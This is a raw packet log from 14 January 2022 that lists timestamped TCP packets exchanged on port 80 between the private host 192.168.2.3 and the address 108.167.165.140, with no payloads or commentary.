Jan 14, 2022 13:49:24.692147970 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692152023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692168951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692174911 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692187071 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692203999 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692208052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692222118 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692239046 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692248106 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692255974 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692269087 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692274094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692290068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692305088 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692307949 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692326069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692338943 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692343950 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692361116 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692364931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692377090 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692394972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692399025 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692411900 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692429066 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692437887 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692447901 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692456961 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692466974 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692485094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692493916 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692503929 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692519903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692537069 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692544937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692553997 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692560911 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692569017 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692573071 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692589998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692595005 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692606926 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692614079 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692626953 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692637920 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692642927 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692646027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692662001 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692679882 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692681074 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692698002 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692708015 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692712069 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692715883 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692734003 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692745924 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692758083 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692770004 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692775011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692792892 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.692805052 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.692856073 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.838690996 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838737011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838766098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838778973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.838793039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838812113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838818073 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.838839054 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838865042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838887930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.838891983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838917017 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838921070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.838943005 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838952065 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.838969946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.838979959 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.838995934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839006901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839023113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839031935 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839050055 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839059114 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839076042 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839103937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839116096 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839129925 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839143991 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839154959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839174032 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839179993 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839190960 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839205980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839217901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839234114 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839260101 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839273930 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839286089 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839302063 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839313030 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839329958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839339018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839348078 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839364052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839390039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839405060 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839416981 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839432001 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839442968 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839459896 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839471102 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839479923 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839498043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839508057 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839524031 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839534998 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839550972 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839570999 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839576006 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839597940 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839601994 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839615107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839631081 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839633942 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839657068 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839684963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839694977 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839710951 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839725018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839740038 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839756012 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839767933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839773893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839792967 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839807987 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839821100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839829922 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839845896 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839873075 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839900970 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839906931 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839926004 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839926958 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839948893 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839952946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839977026 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.839977980 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.839997053 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840012074 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840019941 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840040922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840054035 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840066910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840091944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840094090 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840120077 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840147018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840147972 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840173960 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840183973 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840199947 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840212107 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840224028 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840240002 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840250969 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840260029 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840277910 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840290070 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840302944 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840328932 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840333939 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840356112 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840389013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840405941 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840410948 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840421915 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840430975 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840440035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840456009 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840456963 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840473890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840491056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840502024 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840507984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840522051 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840533018 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840552092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840553045 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840560913 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840564966 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840573072 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840573072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.840593100 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840596914 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840629101 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.840640068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987278938 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987307072 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987319946 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987330914 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987349033 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987363100 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987396955 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987437963 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987514019 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987525940 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987540007 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987560987 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987582922 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987586021 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987606049 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987616062 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987627983 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987648964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987669945 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987674952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987694979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987718105 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987718105 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987742901 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987744093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987766027 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987778902 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987790108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987814903 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987816095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987838984 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987839937 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987864971 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987874985 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987890959 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987911940 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987916946 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987938881 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987945080 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987965107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987982035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.987991095 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.987999916 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988022089 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988023996 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988044024 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988054991 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988069057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988092899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988096952 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988117933 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988117933 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988143921 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988153934 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988169909 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988178968 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988197088 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988207102 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988220930 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988233089 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988245964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988269091 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988280058 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988295078 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988317013 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988327980 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988342047 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988352060 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988365889 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988389015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988392115 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988413095 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988435984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988436937 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988455057 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988461018 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988481998 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988506079 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988507032 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988531113 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988540888 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988555908 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988579035 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988579035 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988598108 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988614082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988627911 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988631964 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988650084 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988657951 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988667011 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988684893 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988693953 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988703012 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988720894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988733053 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988739014 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988754988 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988779068 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988789082 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988790989 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988801956 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988816023 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988831043 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988831043 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988848925 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988864899 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988869905 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988882065 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988898039 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988902092 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988915920 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988931894 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988933086 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988948107 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988965034 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988967896 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.988981009 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.988998890 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989007950 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.989016056 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989032984 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989034891 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.989049911 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989061117 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.989065886 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989083052 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989099979 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989108086 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.989115953 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989132881 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989140987 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.989149094 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:24.989171982 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:24.989197969 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.466285944 CET	49743	80	192.168.2.3	108.167.165.140
Jan 14, 2022 13:49:25.634658098 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634689093 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634712934 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634737015 CET	80	49743	108.167.165.140	192.168.2.3
Jan 14, 2022 13:49:25.634758949 CET	80	49743	108.167.165.140	192.168.2.3
